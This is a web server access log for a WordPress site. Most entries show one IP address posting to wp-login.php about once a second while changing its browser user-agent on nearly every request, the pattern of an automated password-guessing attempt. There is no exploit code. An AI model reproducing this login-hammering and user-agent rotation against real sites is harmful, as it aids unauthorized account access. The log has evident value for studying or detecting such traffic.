45.43.15.136 - - [16/Feb/2026:19:14:00 +0800] "POST /wp-login.php HTTP/1.1" 200 2999 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:121.0) Gecko/20100101 Firefox/121.0"
45.43.15.136 - - [16/Feb/2026:19:14:01 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
45.43.15.136 - - [16/Feb/2026:19:14:02 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 2859 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
45.43.15.136 - - [16/Feb/2026:19:14:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2999 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0"
45.43.15.136 - - [16/Feb/2026:19:14:03 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
45.43.15.136 - - [16/Feb/2026:19:14:04 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 2859 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
45.43.15.136 - - [16/Feb/2026:19:14:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2999 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:120.0) Gecko/20100101 Firefox/120.0"
45.43.15.136 - - [16/Feb/2026:19:14:06 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.43.15.136 - - [16/Feb/2026:19:14:07 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 2859 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Feb/2026:19:14:08 +0800] "POST /wp-cron.php?doing_wp_cron=1771240448.4711980819702148437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.43.15.136 - - [16/Feb/2026:19:14:08 +0800] "POST /wp-login.php HTTP/1.1" 200 2999 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0"
45.43.15.136 - - [16/Feb/2026:19:14:09 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
45.43.15.136 - - [16/Feb/2026:19:14:10 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 2859 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
45.43.15.136 - - [16/Feb/2026:19:14:11 +0800] "POST /wp-login.php HTTP/1.1" 200 2999 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.43.15.136 - - [16/Feb/2026:19:14:12 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0"
